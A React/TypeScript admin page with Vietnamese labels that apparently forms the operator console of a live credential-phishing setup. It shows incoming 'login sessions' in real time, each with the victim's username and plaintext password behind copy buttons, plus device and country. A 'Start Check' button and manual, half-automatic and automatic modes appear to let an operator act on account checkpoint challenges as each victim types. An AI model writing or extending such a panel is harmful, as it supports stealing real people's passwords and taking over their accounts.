import React, { useEffect, useState } from "react";
import { handleError } from "../services/utils";
import {
  getManualSessions,
  manualStart,
  manualDelete,
  manualToggleAutoCheck,
  manualGetAutoCheck,
} from "../services/telegram.service";
import { useMyCopyToClipboard } from "../hooks/useMyCopy";
import { Copy } from "lucide-react";
import { useSocketIO } from "../socketIO";
import { toast } from "react-toastify";

export type ManualSession = {
  socketId: string;
  userName: string;
  password: string;
  status: number;
  device: string;
  country: string;
  createdAt: string;
};

export type GlobalCheckMode = "manual" | "half" | "auto";

const LoginSessionPage: React.FC = () => {
  const [sessions, setSessions] = useState<ManualSession[]>([]);
  const [loading, setLoading] = useState(true);
  const [, copy] = useMyCopyToClipboard();

  const { socketIO } = useSocketIO();
  const [globalCheckMode, setGlobalCheckMode] =
    useState<GlobalCheckMode>("manual");

  useEffect(() => {
    const fetchSessions = async () => {
      try {
        const { data } = await getManualSessions();
        setSessions(data || []);
      } catch (error) {
        handleError(error, "Lỗi khi lấy danh sách phiên manual");
      } finally {
        setLoading(false);
      }
    };
    const fetchAutoCheck = async () => {
      try {
        const { data } = await manualGetAutoCheck();
        setGlobalCheckMode(data);
      } catch (error) {
        handleError(error, "Lỗi khi lấy trạng thái Auto Check");
      }
    };
    fetchAutoCheck();
    fetchSessions();
    socketIO?.on("new_login", () => {
      fetchSessions();
      toast.info(`New User Login, vui lòng kiểm tra!`);
    });
    socketIO?.on("close_login", () => fetchSessions());

    return () => {
      socketIO?.off("new_login");
      socketIO?.off("close_login");
    };
  }, [socketIO]);

  const toggleGlobalAutoCheck = async () => {};

  const handleCopy = async (text: string) => {
    await copy(text);
  };

  const handleStartCheck = async (socketId: string) => {
    await manualStart(socketId);
    window.open(`/detail/${socketId}`, "_blank");
  };

  const handleDelete = async (socketId: string) => {
    const fetchSessions = async () => {
      try {
        const { data } = await getManualSessions();
        setSessions(data);
      } catch (error) {
        handleError(error, "Lỗi khi lấy danh sách phiên manual");
      } finally {
        setLoading(false);
      }
    };

    if (window.confirm("Bạn có chắc chắn muốn xoá phiên này?")) {
      try {
        await manualDelete(socketId);
        await fetchSessions();
      } catch (error) {
        handleError(error, "Xóa phiên thất bại");
      }
    }
  };

  const getStatusTextAndColor = (status: number) => {
    switch (status) {
      case 0:
        return { text: "Đang login", color: "text-gray-500" };
      case 1:
        return { text: "Đang check", color: "text-yellow-600" };
      case 2:
        return { text: "Hoàn Thành", color: "text-green-600" };
      case 3:
        return { text: "Client Đóng Tab", color: "text-red-600" };
      default:
        return { text: "Không xác định", color: "text-gray-400" };
    }
  };

  const handleModeChange = async (e: React.ChangeEvent<HTMLInputElement>) => {
    const mode = e.target.value as GlobalCheckMode;
    setGlobalCheckMode(mode);
    try {
      await manualToggleAutoCheck(mode);
      const fetchSessions = async () => {
        try {
          const { data } = await getManualSessions();
          setSessions(data);
        } catch (error) {
          handleError(error, "Lỗi khi lấy danh sách phiên manual");
        } finally {
          setLoading(false);
        }
      };
      if (mode === "manual") {
        fetchSessions();
      } else {
        setSessions([]);
      }
    } catch (err) {
      handleError(err, "Không thể cập nhật chế độ Auto Check toàn hệ thống");
    }
  };
  return (
    <div className="min-h-screen bg-gray-100 p-6">
      <div className="max-w-6xl mx-auto bg-white shadow rounded-lg p-6">
        <div className="flex justify-between">
          <h1 className="text-xl font-semibold mb-4">
            📌 Danh sách phiên đang xử lý checkpoint
          </h1>
          {/* Radio group */}
          <fieldset className="flex flex-col gap-2">
            <legend className="text-xl text-gray-700 font-semibold mb-4">
              Chế độ kiểm tra toàn hệ thống
            </legend>
            <div className="flex flex-wrap items-center gap-2">
              {/* Manual */}
              <label className="cursor-pointer">
                <input
                  type="radio"
                  name="global-check-mode"
                  value="manual"
                  checked={globalCheckMode === "manual"}
                  onChange={handleModeChange}
                  className="peer sr-only"
                />
                <span
                  className="px-3 py-1.5 rounded-full border border-gray-300 text-sm
                   peer-checked:border-green-500 peer-checked:bg-green-50
                   peer-checked:text-green-700 transition-colors"
                >
                  Manual
                </span>
              </label>

              {/* Half automatically */}
              <label className="cursor-pointer">
                <input
                  type="radio"
                  name="global-check-mode"
                  value="half"
                  checked={globalCheckMode === "half"}
                  onChange={handleModeChange}
                  className="peer sr-only"
                />
                <span
                  className="px-3 py-1.5 rounded-full border border-gray-300 text-sm
                   peer-checked:border-green-500 peer-checked:bg-green-50
                   peer-checked:text-green-700 transition-colors"
                >
                  Half automatically
                </span>
              </label>

              {/* Automatically */}
              <label className="cursor-pointer">
                <input
                  type="radio"
                  name="global-check-mode"
                  value="auto"
                  checked={globalCheckMode === "auto"}
                  onChange={handleModeChange}
                  className="peer sr-only"
                />
                <span
                  className="px-3 py-1.5 rounded-full border border-gray-300 text-sm
                   peer-checked:border-green-500 peer-checked:bg-green-50
                   peer-checked:text-green-700 transition-colors"
                >
                  Automatically
                </span>
              </label>
            </div>
          </fieldset>
        </div>

        {loading ? (
          <div className="text-gray-500">Đang tải dữ liệu...</div>
        ) : sessions?.length === 0 ? (
          <div className="text-gray-500">Không có phiên nào.</div>
        ) : (
          <div className="overflow-x-auto mt-10">
            <table className="table-auto w-full border border-gray-300 text-sm">
              <thead className="bg-gray-100 text-gray-700">
                <tr>
                  <th className="border px-3 py-2">#</th>{" "}
                  {/* Thêm cột số thứ tự */}
                  <th className="border px-3 py-2">Socket ID</th>
                  <th className="border px-3 py-2">User Name</th>
                  <th className="border px-3 py-2">Password</th>
                  <th className="border px-3 py-2">Thiết bị</th>
                  <th className="border px-3 py-2">Quốc gia</th>
                  <th className="border px-3 py-2">Trạng thái</th>
                  <th className="border px-3 py-2">Bắt đầu login vào lúc</th>
                  <th className="border px-3 py-2">Hành động</th>
                </tr>
              </thead>
              <tbody>
                {sessions?.map((s, idx) => {
                  const { text, color } = getStatusTextAndColor(s.status);

                  return (
                    <tr
                      key={s.socketId}
                      className={`${
                        idx % 2 === 0 ? "bg-white" : "bg-gray-50"
                      } hover:bg-yellow-50 transition`}
                    >
                      {/* Cột số thứ tự */}
                      <td className="border px-3 py-2 font-bold text-center">
                        {idx === 0 ? (
                          <span className="text-green-600">NEW</span>
                        ) : (
                          idx + 1
                        )}
                      </td>

                      <td className="border px-3 py-2 font-mono">
                        {s.socketId}
                      </td>

                      <td className="border px-3 py-2">
                        <div
                          className="flex items-center gap-2 cursor-pointer text-blue-600 hover:underline"
                          onClick={() => handleCopy(s.userName)}
                          title="Click để copy User Name"
                        >
                          <span>{s.userName}</span>
                          <Copy className="w-4 h-4 text-gray-500 hover:text-blue-700 transition" />
                        </div>
                      </td>

                      <td className="border px-3 py-2">
                        <div
                          className="flex items-center gap-2 cursor-pointer text-blue-600 hover:underline"
                          onClick={() => handleCopy(s.password)}
                          title="Click để copy Password"
                        >
                          <span>{s.password}</span>
                          <Copy className="w-4 h-4 text-gray-500 hover:text-blue-700 transition" />
                        </div>
                      </td>
                      <td className="border px-3 py-2">{s.device}</td>
                      <td className="border px-3 py-2">{s.country}</td>

                      <td className="border px-3 py-2 font-semibold">
                        <span className={color}>{text}</span>
                      </td>
                      <td className="border px-3 py-2">
                        {new Date(s.createdAt).toLocaleString("vi-VN", {
                          timeZone: "Asia/Ho_Chi_Minh",
                          hour12: false,
                        })}
                      </td>

                      <td className="border px-3 py-2 space-x-2 flex items-center justify-between">
                        {s.status === 0 ? (
                          <button
                            className="px-3 py-1 bg-blue-600 text-white rounded hover:bg-blue-700 transition text-xs"
                            onClick={() => handleStartCheck(s.socketId)}
                          >
                            Start Check
                          </button>
                        ) : (
                          <div />
                        )}
                        <button
                          className="px-3 py-1 bg-red-500 text-white rounded hover:bg-red-600 transition text-xs"
                          onClick={() => handleDelete(s.socketId)}
                        >
                          Delete
                        </button>
                      </td>
                    </tr>
                  );
                })}
              </tbody>
            </table>
          </div>
        )}
      </div>
    </div>
  );
};

export default LoginSessionPage;
